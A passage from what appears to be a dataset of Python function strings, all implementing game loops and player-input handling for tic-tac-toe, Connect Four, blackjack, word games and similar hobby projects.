self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n 
self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)", "def play():\n global done\n done = False\n g = Game()\n turn = random.choice([PLAYER, AI])\n transitions_agent = []\n agent.epsilon = agent.eps_min\n while done == False:\n g.printBoard()\n if turn == PLAYER:\n row = input('{}\\'s turn:'.format('Red'))\n g.insert(int(row), PLAYER_PIECE)\n else:\n observation = []\n for sublist in g.board:\n for i in sublist:\n observation.append(i)\n observation = np.asarray(observation)\n action = agent.choose_action(observation)\n if g.check_if_action_valid(action):\n print('{}\\'s turn: %d'.format('Yellow') % action)\n g.insert(action, AI_PIECE)\n else:\n while g.check_if_action_valid(action) == False:\n agent.store_transition(observation, action, -100, observation, done)\n action = action = np.random.randint(7)\n print('{}\\'s turn: %d'.format('Yellow') % action)\n g.insert(action, AI_PIECE)\n observation_ = []\n for sublist in g.board:\n for i in sublist:\n observation_.append(i)\n observation_ = np.asarray(observation_)\n transitions_agent += [(observation, action, observation_, done)]\n turn = AI if turn == PLAYER else PLAYER\n winner = AI if turn == PLAYER else PLAYER\n if winner == AI:\n reward = 20\n else:\n reward = -20\n for i in range(len(transitions_agent)):\n agent.store_transition(transitions_agent[i][0], transitions_agent[i][1], reward, transitions_agent[i][2],\n transitions_agent[i][3])\n agent.learn()\n return", "def next_move(board, player):\n \n move_row = \"move\"\n move_column = \"move\"\n\n while not move_row.isnumeric():\n move_row = input(\"{}, pick row to place your {}. > \".format(player.name, player.char))\n while not move_column.isnumeric(): \n move_column = input(\"Pick column in row {} to place your {}. > \".format(move_row, player.char))\n\n move_row = int(move_row)\n move_column = int(move_column)\n\n move = Move(player, (move_row, move_column))\n \n # Check if move is out of bounds\n if (move_row >= len(board.current_board) or\n move_column >= len(board.current_board)):\n print(\"Move out of bounds. Choose a valid move.\")\n return board\n\n # Check if space is already used\n if board.current_board[move_row][move_column] != \"-\":\n print(\"Spot already played. Pick an unused space.\")\n return board\n\n board.last_move = player.name\n board.add_move(move)\n\n return board", "def play_move(self,state):\n #Keep asking for the next move until a valid move.\n while(True):\n childList = state.get_successors()\n print(\"Your possible moves:\")\n i = 0\n for c in childList:\n if i > 0 and i%4 == 0:\n print()\n print(c.get_action().ljust(10),end=\"\\t\");\n i += 1\n print()\n nextMove = input(\"What is your next move? 
\\ne.g.'F2-E3' or 'Quit'\\n\")\n #Check if the move is valid\n if nextMove.lower() == 'Quit'.lower():\n return None\n for c in childList:\n if c.get_action().upper() == nextMove.upper():\n return c\n # Move not possible \n print(\"Invalid move!! Please try again...\\n\")", "def player_play(self, color, x, y):\r\n self.tr.bd.disks[x][y].color,\r\n self.tr.bd.disks[x][y].display_on = color, True\r\n self.tr.bd.disks[x][y].chain()\r\n self.tr.board_scan_reset()\r\n # Checks for computer move, if none, then checks for another move\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n else:\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n # If none, ends game.\r\n else:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def handle_input_event(self):\n\n self.markerPos = self.get_mouse_coordinate()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n raise QuitRequestedError\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n raise QuitRequestedError\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Event.is_valid_placement_stage(self.event):\n self.choice = self.get_mouse_coordinate()\n self.event = Event.next(self.event)\n self.timestep_watch.reset()\n\n liberties = self.env.liberty_after_next_steps(self.env.turn, self.env.getOpponent())\n self.env.printField(liberties)\n print()\n # self.env.printFlipNum(self.env.turn)\n # print(self.env.update_num_disks_can_filp(self.choice[0], self.choice[1], self.env.turn))\n\n # print(\"Click \", pos, \"coordinates: \", row, col)", "def main():\n \n games = 'chess simon puzzle chess go slide go sudoku snake'.split()\n gi = 0\n game = games[gi]\n board = set_game(game)\n board.keys[K_t] = test\n \n while board.active:\n for event in pygame.event.get():\n board.do_event(event)\n if event.type == KEYDOWN:\n if event.key == K_g:\n gi = (gi + 1) % len(games)\n board = set_game(games[gi])\n \n board.update()\n \n pygame.quit()", "def perform_action(self, current_player, action):\n self.inputs_[action] = current_player\n if Config.USER['debug']['enabled']:\n print \"---\"\n print str(self.inputs_[0:3])\n print str(self.inputs_[3:6])\n print str(self.inputs_[6:9])", "def play_game(cls):\n os.system('cls')\n # Get the board size\n prompt = \"What size board do you want? 
(3-10)\"\n size = input(prompt)\n while size not in [str(x) for x in range(3, 11)]:\n size = input(prompt)\n cls.size = int(size)\n\n cls.clear_board()\n\n # Non-blocking fashion\n listener = keyboard.Listener(on_release=cls.on_release)\n listener.start()", "def play_minion(num_cards_in_hand, card_idx):\n click_on_card(num_cards_in_hand, card_idx)\n mouseclick(510, 472)", "def ask_user():\r\n while True:\r\n if bj.player1.double_down is True and bj.player1.split is True and bj.player1.went_split is False:\r\n p_choice = input(\"Hit, Stand, Double Down or Split?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"dd\" and p_choice != \"double\" and p_choice != \"double down\" and p_choice != \"split\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n elif bj.player1.split is True and bj.player1.went_split is False: # various input prompts depending on available player choices\r\n p_choice = input(\"Hit, Stand or Split?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"split\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n elif bj.player1.double_down is True:\r\n p_choice = input(\"Hit, Stand or Double Down?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"dd\" and p_choice != \"double\" and p_choice != \"double down\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n else:\r\n p_choice = input(\"Hit or Stand?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice", "def play():\n\n while True:\n print(\"Press any key to pick a piece (or q to quit): \")\n user_input = getch.getch()\n clear_screen()\n\n if user_input != 'q':\n current_piece = choice(list(pieces.keys())) \n print(current_piece, ': ', pieces[current_piece]['icon'], '\\n', sep=\"\")\n print(pieces[current_piece]['move'], '\\n')\n else:\n print(\"Thanks for trying No Stress Chess®\")\n break", "def process_input(self):\n for event in pygame.event.get():\n\n if self.joystick and self.state == self.STATE_PLAY:\n\n if event.type == pygame.JOYAXISMOTION:\n self.gameevents.add(\"joyaxismotion\", event.axis, event.value, type='EVENT_USER')\n elif event.type == pygame.JOYBUTTONDOWN:\n if event.button == self.fire_button:\n self.gameevents.add(\"press\", \"fire\", type='EVENT_USER')\n elif event.button == self.IFF_button:\n self.gameevents.add(\"press\", \"iff\", type='EVENT_USER')\n elif event.button == self.shots_button:\n self.gameevents.add(\"press\", \"shots\", type='EVENT_USER')\n elif event.button == self.pnts_button:\n self.gameevents.add(\"press\", \"pnts\", type='EVENT_USER')\n elif event.type == pygame.JOYBUTTONUP:\n if event.button == self.fire_button:\n self.gameevents.add(\"release\", \"fire\", type='EVENT_USER')\n elif event.button == self.IFF_button:\n self.gameevents.add(\"release\", \"iff\", type='EVENT_USER')\n elif event.button == self.shots_button:\n self.gameevents.add(\"release\", \"shots\", type='EVENT_USER')\n elif event.button == self.pnts_button:\n self.gameevents.add(\"release\", \"pnts\", type='EVENT_USER')\n\n else:\n\n if event.type == pygame.KEYDOWN:\n\n if (pygame.key.get_mods() & self.modifier):\n if event.key == pygame.K_q:\n self.gameevents.add(\"press\", \"quit\", type='EVENT_USER')\n\n if event.key == pygame.K_RETURN:\n\n if self.state == self.STATE_INTRO:\n self.state = self.STATE_SETUP\n\n elif self.state == self.STATE_SETUP:\n self.state = 
self.STATE_GAMENO\n\n elif self.state == self.STATE_GAMENO:\n if self.mine_exists:\n self.state = self.STATE_SETUP_IFF\n else:\n self.state = self.STATE_PREPARE\n\n elif self.state == self.STATE_IFF:\n self.state = self.STATE_PREPARE\n\n elif self.state == self.STATE_SCORES:\n self.state = self.STATE_SETUP\n\n elif self.state == self.STATE_PLAY:\n\n if event.key == self.thrust_key:\n self.gameevents.add(\"press\", \"thrust\", type='EVENT_USER')\n elif event.key == self.left_turn_key:\n self.gameevents.add(\"press\", \"left\", type='EVENT_USER')\n elif event.key == self.right_turn_key:\n self.gameevents.add(\"press\", \"right\", type='EVENT_USER')\n elif event.key == self.fire_key:\n self.gameevents.add(\"press\", \"fire\", type='EVENT_USER')\n elif event.key == self.IFF_key:\n self.gameevents.add(\"press\", \"iff\", type='EVENT_USER')\n elif event.key == self.shots_key:\n self.gameevents.add(\"press\", \"shots\", type='EVENT_USER')\n elif event.key == self.pnts_key:\n self.gameevents.add(\"press\", \"pnts\", type='EVENT_USER')\n elif event.key == self.pause_key and self.config['General']['allow_pause']:\n self.gameevents.add(\"press\", \"pause\", type='EVENT_USER')\n else:\n self.gameevents.add(\"press\", event.key, \"user\", type='EVENT_SYSTEM')\n \n elif self.state == self.STATE_PAUSED and event.key == self.pause_key:\n self.gameevents.add(\"press\", \"unpause\", type='EVENT_USER')\n \n else:\n self.gameevents.add(\"press\", event.key, \"user\", type='EVENT_SYSTEM')\n\n elif event.type == pygame.KEYUP:\n\n if self.state == self.STATE_PLAY:\n\n if event.key == self.thrust_key:\n self.gameevents.add(\"release\", \"thrust\", type='EVENT_USER')\n elif event.key == self.left_turn_key:\n self.gameevents.add(\"release\", \"left\", type='EVENT_USER')\n elif event.key == self.right_turn_key:\n self.gameevents.add(\"release\", \"right\", type='EVENT_USER')\n elif event.key == self.fire_key:\n self.gameevents.add(\"release\", \"fire\", type='EVENT_USER')\n elif event.key == self.IFF_key:\n self.gameevents.add(\"release\", \"iff\", type='EVENT_USER')\n elif event.key == self.shots_key:\n self.gameevents.add(\"release\", \"shots\", type='EVENT_USER')\n elif event.key == self.pnts_key:\n self.gameevents.add(\"release\", \"pnts\", type='EVENT_USER')", "def play_DQN_game(self):\n self.reset()\n while(not self._exit):\n pg.event.pump()\n self.clock.tick(self.actions_per_second)\n self.check_for_exit()\n self.handle_keyboard_input()\n self.perform_DQN_actions()\n self.check_for_end_game()\n self.render()\n\n self.cleanup()", "def handle_turn(player_):\n if player_ == computer:\n print('\\nNow ', player_ + \"'s turn.\")\n position = block_to_win()\n if position == -1:\n position = check_if_computer_can_win()\n if position == -1:\n position = randrange(0, 9)\n while board[position] not in ['_']:\n position = randrange(0, 9)\n board[position] = computer\n display_board()\n if player_ == player:\n print('\\nNow ', player_ + \"'s turn.\")\n position = int(input('Choose a position from 1-9 (available): '))\n while position not in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n position = int(input('Wrong input. Choose a position from 1-9: '))\n position = position - 1\n while board[position] not in ['_']:\n position = int(input('Position is already taken. 
Choose from available positions: '))\n position = position - 1\n board[position] = player\n display_board()", "def player_turn(self):\n if self.turn == \"x\":\n player_name = self.player_1\n else:\n player_name = self.player_2\n\n player_choice = input(f\"{player_name}, pick an open box to put an {self.turn} by entering the column, 'a', 'b',\"\n f\" or 'c' and the cell number, 1, 2, 3. (e.g. 'a1', 'b2' or 'c3'):\\n\").strip().lower()\n\n while player_choice not in valid_choices:\n print(f\"Invalid choice entered! Please submit an open box as listed below\")\n player_choice = input(\n f\"{player_name}, pick an open box to put an {self.turn} by entering the column, 'a', 'b', or \"\n f\"'c' and the cell number, 1, 2, 3. (e.g. 'a1', 'b2' or 'c3'):\\n\").strip().lower()\n\n self.update_board(player_choice)", "def get_player_action(self) -> None:\n print(f\"\\nYou have: {self.user.hand.cards} totalling to {self.user.hand.value}\")\n while not self.get_game_ending_hands():\n action = self.validate_input(\"Do you want to 1. hit or 2. stand?\", ('1', '2'))\n if action == '1':\n self.action_hit()\n elif action == '2':\n self.action_stand()\n break", "def play_cpu(self):\n \n # Play button sound\n self.button_sound()\n\n while True:\n\n # If turns is 9, then all the places on the board are filled. Hence Cpu doesn't get a turn. \n if self.turn >= 9:\n break\n\n # Choose a random position and if that position on board is empty, then place a 'O' there.\n i = random.randint(0, 8)\n if self.board[i] == 0:\n #root.after(400)\n self.button_list[i].config(image=self.O_img)\n self.board[i] = -1\n self.turn += 1\n\n break", "def random_play(board, NN, device=\"cpu\"):\r\n board_state_string = board.fen() # obtain state from board\r\n state_array = input_state(board_state_string) # turn state into an array format for NN\r\n is_black = not is_white(board_state_string)\r\n print(\"is black: \",is_black)\r\n legal_moves_array = np.zeros([4672]) # initialize array of legal moves\r\n legal_moves_array, move_dict = return_legal_moves(board, is_black)\r\n # print(\"state array shape: \", state_array.shape)\r\n # print(\"legal array sahpe: \", legal_moves_array.shape)\r\n legal_moves_prob_distribution, _ = (NN.run(state_array, legal_moves_array, device=device)) #we're assuming that NN forward runs the neural network\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution / np.sum(legal_moves_prob_distribution) # normalize\r\n legal_moves_prob_distribution = legal_moves_prob_distribution.numpy().reshape(4672)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution - np.min(legal_moves_prob_distribution)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution /legal_moves_prob_distribution.sum()\r\n # print(\"legal_moves_prob_distribution sum \",abs(legal_moves_prob_distribution).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution* legal_moves_arrayCopy).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution).sum())\r\n action_idx = np.random.choice(4672, p = legal_moves_prob_distribution )\r\n print(\"action idx: \", action_idx)\r\n action_array = np.zeros([4672])\r\n action_array[action_idx] = 1\r\n move_text = move_dict[action_idx]\r\n print(\"move text: \", move_text)\r\n env_move = chess.Move.from_uci(move_text)\r\n board.push(env_move)\r\n return action_array", "def play_gui():\n global done\n GAME_OVER = False\n pygame.init()\n board = create_board()\n\n screen = pygame.display.set_mode(SIZE)\n 
draw_board(board, screen)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n turn = np.random.randint(0, 2)\n\n while not GAME_OVER:\n g = Game()\n done = False\n transitions_agent = []\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n posx = event.pos[0]\n if turn == PLAYER:\n pygame.draw.circle(screen, red, (posx, int(SQUARESIZE / 2)), RADIUS)\n pygame.display.update()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n\n if turn == PLAYER:\n posx = event.pos[0]\n col = int(math.floor(posx / SQUARESIZE))\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, PLAYER_PIECE)\n\n if winning_move(board, PLAYER_PIECE):\n label = myfont.render(\"Player 1 wins!!\", 1, red)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n turn = (turn + 1) % 2\n draw_board(board, screen)\n\n # # Ask for Player 2 Input\n if turn == AI and not GAME_OVER:\n observation = []\n #print(f\"BOARD: {board}\")\n temp_board = np.flipud(board)\n for col in range(COLUMN_COUNT):\n col_elements = temp_board[:,col]\n for element in col_elements:\n observation.append(element)\n\n #print(f\"OBS: {observation}\")\n observation = np.asarray(observation)\n col = agent.choose_action(observation)\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2\n\n else:\n print(\"AI random choice\")\n col = np.random.randint(7)\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2", "def main():\r\n print(WELCOME_MESSAGE)\r\n\r\n playing = True\r\n while playing:\r\n\r\n # Valid inputs that the user can use\r\n move_actions = (UP, DOWN, LEFT, RIGHT)\r\n other_actions = (GIVE_UP, HELP)\r\n\r\n grid_size = int(input(BOARD_SIZE_PROMPT))\r\n\r\n # Get the puzzle and its solution\r\n solution = get_game_solution(WORDS_FILE, grid_size)\r\n puzzle = shuffle_puzzle(solution)\r\n\r\n solved = check_win(puzzle, solution)\r\n print_solution_position(solution, puzzle)\r\n\r\n # Continue to loop until the puzzle is solved or the user gives up\r\n while not solved:\r\n player_action = input(DIRECTION_PROMPT)\r\n\r\n # Player move input handler\r\n # Updates the puzzle with the new board layout, if fail alert user\r\n if player_action in move_actions:\r\n move_attempt = move(puzzle, player_action)\r\n if move_attempt:\r\n puzzle = move_attempt\r\n else:\r\n print(INVALID_MOVE_FORMAT.format(player_action))\r\n\r\n # Other inputs handler\r\n elif player_action in other_actions:\r\n if player_action == GIVE_UP:\r\n break\r\n elif player_action == HELP:\r\n print(HELP_MESSAGE)\r\n\r\n # If there is no match for input, alert the user\r\n else:\r\n print(INVALID_MESSAGE)\r\n\r\n print_solution_position(solution, puzzle)\r\n solved = check_win(puzzle, solution)\r\n\r\n # Show message depending if user won or not\r\n if solved:\r\n print(WIN_MESSAGE)\r\n else:\r\n print(GIVE_UP_MESSAGE)\r\n\r\n # Check if the user wishes to 
play again\r\n play_again = input(PLAY_AGAIN_PROMPT)\r\n if not (play_again.lower() == \"y\" or play_again == \"\"):\r\n playing = False\r\n print(BYE)", "def play(auto_A: bool = False, auto_B: bool = False) -> None:\n board: Board = Board()\n player: Player = Player.A\n move_count: int = 1\n cell_number: int = 0\n print('Welcome to the Tic-Tac-Toe game!')\n while move_count <= 9:\n print(board.display())\n player_name: str = player.display()\n\n if player == Player.A and auto_A or player == Player.B and auto_B:\n cell_number = minimax(board, player)\n print(f'[{move_count}] Player {player_name} moved to {cell_number}.')\n else:\n response: str = input(f'[{move_count}] Player {player_name}, enter your move or q to exit: ')\n\n if response == 'q':\n print(\"Game exited.\")\n break\n\n response_error: Optional[str] = validate_response(response)\n if response_error is not None:\n print(f'ERROR! {response_error}')\n continue\n\n cell_number = int(response)\n if not board.is_cell_empty(cell_number):\n print(f'ERROR! Cell number {cell_number} is not empty.')\n continue\n\n board = board.make_move(player, cell_number)\n if board.is_win(player):\n print(board.display())\n print(f'Congratulations, player {player_name}! You won in {move_count} moves.')\n break\n else:\n move_count += 1\n player = player.switch()\n if move_count > 9:\n print(board.display())\n print('This game has ended in a draw.')", "def check_for_input(self):\n if self.state == 'resting':\n if self.keys[pg.K_UP]:\n self.begin_moving('up')\n elif self.keys[pg.K_DOWN]:\n self.begin_moving('down')\n elif self.keys[pg.K_LEFT]:\n self.begin_moving('left')\n elif self.keys[pg.K_RIGHT]:\n self.begin_moving('right')", "def playGame(b, px, po):\n \n nextPieceToMove = [\"X\",\"O\"] \n nextPlayerToMove = [px,po]\n n=0\n # FILL IN CODE HERE\n while True:\n if b.isFull() == False and nextPlayerToMove[n%2] == \"human\":\n move = askformove(b)\n b.addMove(move, nextPieceToMove[n%2])\n print(b)\n if b.winsFor(nextPieceToMove[n%2]):\n nextPieceToMove = nextPieceToMove[n%2]\n print(nextPieceToMove + \" wins!\")\n break\n elif not b.isFull():\n move = nextPlayerToMove[n%2].nextMove(b)\n b.addMove(move, nextPieceToMove[n%2])\n print(b)\n if b.winsFor(nextPieceToMove[n%2]):\n nextPieceToMove = nextPieceToMove[n%2]\n print(nextPieceToMove + \" wins!\")\n break\n else:\n nextPieceToMove = \"D\"\n break\n n = 1+n \n return(b.data, nextPieceToMove)", "def main(self):\n while 1:\n events = get_gamepad()\n for event in events:\n\n if(event.ev_type == \"Absolute\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.absolute_switch[ self.map[GAMEPAD][event.code] ](event.state)\n\n\n if(event.ev_type == \"Key\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.btn_switch[ self.map[GAMEPAD][event.code] ](self.map[GAMEPAD][event.code], event.state)\n \n\n\n\n #print(event.ev_type, event.code, event.state)", "def play_game(word_list):\n # TO DO ...\n\n hand = deal_hand(HAND_SIZE) # random init\n\n while True:\n cmd = input('Enter n to deal a new hand, r to replay the last hand, or e to end game: ')\n\n if cmd == 'n':\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n print()\n\n elif cmd == 'r':\n play_hand(hand.copy(), word_list)\n print()\n\n elif cmd == 'e':\n break\n\n else:\n print(\"Invalid command.\")", "def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = 
\" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break", "def GetNextMove(board, index, teams, mover):\n\tif teams[mover] == 'H':\n\t\twhile True:\n\t\t\tmove = int(input('Tell me your move, {}: '.format(mover)))\n\t\t\tresult = ValidateMove(board, mover, move)\n\t\t\tif result == MoveValidation.Valid:\n\t\t\t\treturn move\n\telse:\n\t\treturn GetComputerMove(board, index, mover)", "def run_next(self, action):\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Run the simulation loop\r\n self.SimulationLoop(action)\r\n if GUIEnabled and self.settings.drawMenu:\r\n self.gui_app.paint(self.screen)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.settings.hz)\r\n self.fps = self.clock.get_fps()", "def play_game(word_list):\n hand = deal_hand(HAND_SIZE)\n\n while True:\n game = raw_input(\"\\nEnter 'n' to play a new game. Enter 'r' to replay your last game. Enter 'e' to exit. \\n\")\n\n if game == \"n\":\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n elif game == \"r\":\n play_hand(hand.copy(), word_list)\n elif game == \"e\":\n print \"Game ended.\"\n break\n else:\n print \"Please enter a valid command.\"\n return play_game(word_list)\n\n comp_game = raw_input((\"\\nEnter 'u' to play a new game. Enter 'c' to have the computer play a game.\"))\n\n while comp_game != \"u\" and comp_game != \"c\":\n print \"Please enter a valid command.\"\n comp_game = raw_input((\"\\nEnter 'u' to play a new game. Enter 'c' to have the computer play a game. \"))\n\n if comp_game == \"u\":\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n elif comp_game == \"c\":\n hand = deal_hand(HAND_SIZE)\n comp_play_hand(hand.copy(), word_list)", "def playGameplus(wordList):\n #选择游戏模式\n global la_st2\n n = 0\n print '请选择你想进行的模式:a:单人 c:人机 e: 退出游戏'\n while True:\n order9 = raw_input('>>>').lower()\n if (order9 == 'a') or (order9 =='c'):\n moudl = True\n break\n elif order9 == 'e':\n moudl = False\n print '游戏已退出'\n print ' = ' * 20\n break\n else:\n print '命令有误,请重新输入'\n if moudl:\n print 'n:新的游戏 r:重开上局 e:退出'\n order8 = raw_input('>>>').lower() \n while True:\n if order8 == 'n':\n while True:\n n = raw_input('你想获取的字母数(大于4个):')\n while True:\n try:\n n = int(n)\n if n > 4:\n break\n except ValueError,e:\n print '输入有误!'\n if order9 == 'a':\n hand = dealHand(n)\n la_st = copy.deepcopy(hand)\n playHand(hand, wordList, n)\n elif order9 == 'c':\n hand = dealHand(n)\n la_st = copy.deepcopy(hand)\n playHandplus(hand, wordList, n)\n if order8 == 'r':\n if la_st2 and (order9 == 'a'):\n playHand(la_st, wordList, n)\n elif la_st2 and (order9 == 'c'):\n playHandplus(hand, wordList, n)\n elif not la_st2:\n print '您没有上局存档,请重新输入指令:'\n order8 = raw_input('>>>').lower()\n if order8 == 'e':\n print '游戏结束'\n break\n if not order8 in ['r','n','e'] or order8 == '':\n print '请重新输入指令:'\n order8 = raw_input('>>>').lower()", "def nextQuestion(self):\n\t\tif len(self.usedQuestions) == self.numQuestions:\n\t\t\tif not self.nextRound():\n\t\t\t\treturn\n\n\t\tif self.selectingPlayer == '' or self.players[self.selectingPlayer][2] == 'Disconnected':\n\t\t\tself.choosePlayer()\n\t\telse:\n\t\t\tself.changeStatus(self.selectingPlayer, 'Selecting')\n\n\t\tfor player in 
self.players.items():\n\t\t\ttry:\n\t\t\t\tplayer[1][0].displayGrid()\n\t\t\texcept (ConnectionClosedError, ProtocolError):\n\t\t\t\tself.changeStatus(player[0], 'Disconnected')\n\n\t\tself.gridDisplayed.emit()", "def playGame(wordList):\n while True:\n user_input = str(input('Enter n to deal a new hand, r to replay the last hand, or e to end game: '))\n if user_input == 'e':\n break\n elif user_input == 'n':\n while True:\n play_mode = str(input('Enter u to have yourself play, c to have the computer play: '))\n if play_mode == 'u':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n break\n elif play_mode == 'c':\n hand = dealHand(HAND_SIZE)\n compPlayHand(hand, wordList, HAND_SIZE)\n break\n else:\n print('Invalid command.') \n elif user_input == 'r':\n try:\n hand\n play_mode = str(input('Enter u to have yourself play, c to have the computer play: '))\n if play_mode == 'u':\n playHand(hand, wordList, HAND_SIZE)\n elif play_mode == 'c':\n compPlayHand(hand, wordList, HAND_SIZE)\n else:\n print('Invalid command.')\n except:\n print('You have not played a hand yet. Please play a new hand first!')\n else:\n print('Invalid command.')", "def update(self, player_index=0, num_players=1, visible_scards = []):\n\n self.visible_scards = visible_scards\n self.controller._state.player_index = player_index\n if self.num_players > num_players and self.controller._state.rules.Shared_Board \\\n and not self.need_updated_buttons:\n # A player has left the game after the round has begun -- make adjustments so game can continue.\n self.playerLeftGame(num_players)\n self.num_players = num_players\n if self.controller._state.round == -1:\n self.mesgBetweenRounds(self.help_text)\n if self.round_advance:\n self.round_index = self.round_index + 1\n if self.round_index < len(self.Meld_Threshold):\n self.help_text[0] = 'This is the round of ' + str(self.Meld_Threshold[self.round_index]) + ' ! '\n self.need_updated_buttons = True # used for Liverpool.\n else:\n self.help_text = ['Game has concluded. Scores for each round can be found in command window.']\n self.round_advance = False\n else:\n if not self.round_index == self.controller._state.round:\n # Need this to true up round_index if a player joins mid-game.\n skipped_rounds = self.controller._state.round - self.round_index\n for idx in range(skipped_rounds):\n #todo: How to score latecomers should be moved to ruleset.\n score = 0\n self.controller.lateJoinScores(score)\n self.round_index = self.controller._state.round\n self.round_advance = True\n # reset outline colors on ready buttons to what they need to be at the start of the \"between rounds\" state.\n self.ready_color_idx = 2\n self.not_ready_color_idx = 6\n self.last_hand = self.current_hand\n self.current_hand = self.controller.getHand()\n if len(self.current_hand) == 0:\n self.hand_info = []\n elif not self.last_hand == self.current_hand:\n self.hand_info = HandManagement.WrapHand(self, self.current_hand, self.hand_info)\n HandManagement.ShowHolding(self, self.hand_info) # displays hand\n self.RuleSetsButtons.ButtonDisplay(self)", "def playGame(wordList):\n hand = None\n while True:\n selection = raw_input(\"Enter n to deal a new hand, r to replay the last hand, or e to end game:\")\n if selection == 'n':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n print\n \n elif selection == 'r':\n if hand is None:\n print \"You have not played a hand yet. 
Please play a new hand first!\"\n print\n \n else:\n playHand(hand, wordList, HAND_SIZE)\n\n elif selection == 'e':\n break\n\n else: \n print \"Invalid command.\"", "def listenMove(s):\n debugPrint(\"FUNCTION AcornClient.listenMove()\")\n print(grid)\n loop = True\n while loop:\n move = input(\">>> \").lower()\n if move in ['w']:\n loop = False\n sendMove(s, 'up')\n elif move in ['s']:\n loop = False\n sendMove(s, 'down')\n elif move in ['d']:\n loop = False\n sendMove(s, 'right')\n elif move in ['a']:\n loop = False\n sendMove(s, 'left')\n else:\n print(\"Please choose either: 'up', 'down', 'left', or 'right'. Thank you.\") # In case the user is trying to break the system :(\n debugPrint(\"User input an unknown direction: %s\" % move, 1)", "def game(self):\n sender = self.sender()\n if(sender.text() == \" \"):\n sender.setText(\"x\" if self.firstPlayer else \"0\")\n self.firstPlayer = not(self.firstPlayer)\n res = self.checkForResult()\n if(res[0] == True):\n self.endGame(res[1])", "def play(self):\n \n while True:\n self.print_board()\n self.display_board()\n winner = self.is_game_won()\n if winner or self.is_filled():\n break\n \n if self.turn == _PLAYER:\n col = self.human_turn()\n else:\n col = self.ai_turn()\n\n row = self.get_row_for_col(col)\n self.board[7 * row + col] = self.turn\n self.last_play_rc = row, col\n\n if self.debug:\n print(\"position scores:\",\n \"player=\", score_position(self.board, _PLAYER),\n \"ai=\", score_position(self.board, _AI))\n \n self.turn = _AI if self.turn == 